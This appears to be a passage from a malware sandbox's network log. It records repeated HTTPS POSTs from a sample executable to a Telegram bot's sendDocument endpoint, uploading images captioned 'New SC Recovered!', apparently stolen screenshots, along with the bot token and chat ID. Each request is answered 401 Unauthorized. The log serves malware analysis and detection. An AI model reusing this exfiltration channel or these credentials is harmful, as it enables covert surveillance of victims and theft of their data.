2024-07-25 22:01:40 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 2d 2d 0d 0a Data Ascii: -----------------------------8dcd883f159ae3d--
2024-07-25 22:01:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:40 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:40 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49738	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:42 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcdb04645b2b88 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:42 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 32 2f 32 30 32 34 20 31 32 3a 34 35 3a 30 30 0a 55 73 65 72 Data Ascii: -----------------------------8dcdb04645b2b88Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcdb04645b2b88Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/22/2024 12:45:00User
2024-07-25 22:01:42 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:42 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:42 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:42 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:42 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 30 34 36 34 35 62 32 62 38 38 2d 2d 0d 0a Data Ascii: -----------------------------8dcdb04645b2b88--
2024-07-25 22:01:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49740	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:48 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcdf0de441e7a8 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:48 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 37 2f 32 30 32 34 20 31 35 3a 35 33 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dcdf0de441e7a8Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcdf0de441e7a8Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/27/2024 15:53:10User
2024-07-25 22:01:48 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:48 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:48 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:48 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:48 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 30 64 65 34 34 31 65 37 61 38 2d 2d 0d 0a Data Ascii: -----------------------------8dcdf0de441e7a8--
2024-07-25 22:01:48 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:48 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49741	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:00 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce4e1dc8f71b2 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:00 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 35 2f 32 30 32 34 20 30 31 3a 35 33 3a 30 32 0a 55 73 65 72 Data Ascii: -----------------------------8dce4e1dc8f71b2Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dce4e1dc8f71b2Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/05/2024 01:53:02User
2024-07-25 22:02:00 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:00 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:00 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:00 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:00 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 65 31 64 63 38 66 37 31 62 32 2d 2d 0d 0a Data Ascii: -----------------------------8dce4e1dc8f71b2--
2024-07-25 22:02:00 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:00 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49742	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:07 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce963108a87c4 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:08 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 30 2f 32 30 32 34 20 31 39 3a 31 38 3a 30 36 0a 55 73 65 72 Data Ascii: -----------------------------8dce963108a87c4Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dce963108a87c4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/10/2024 19:18:06User
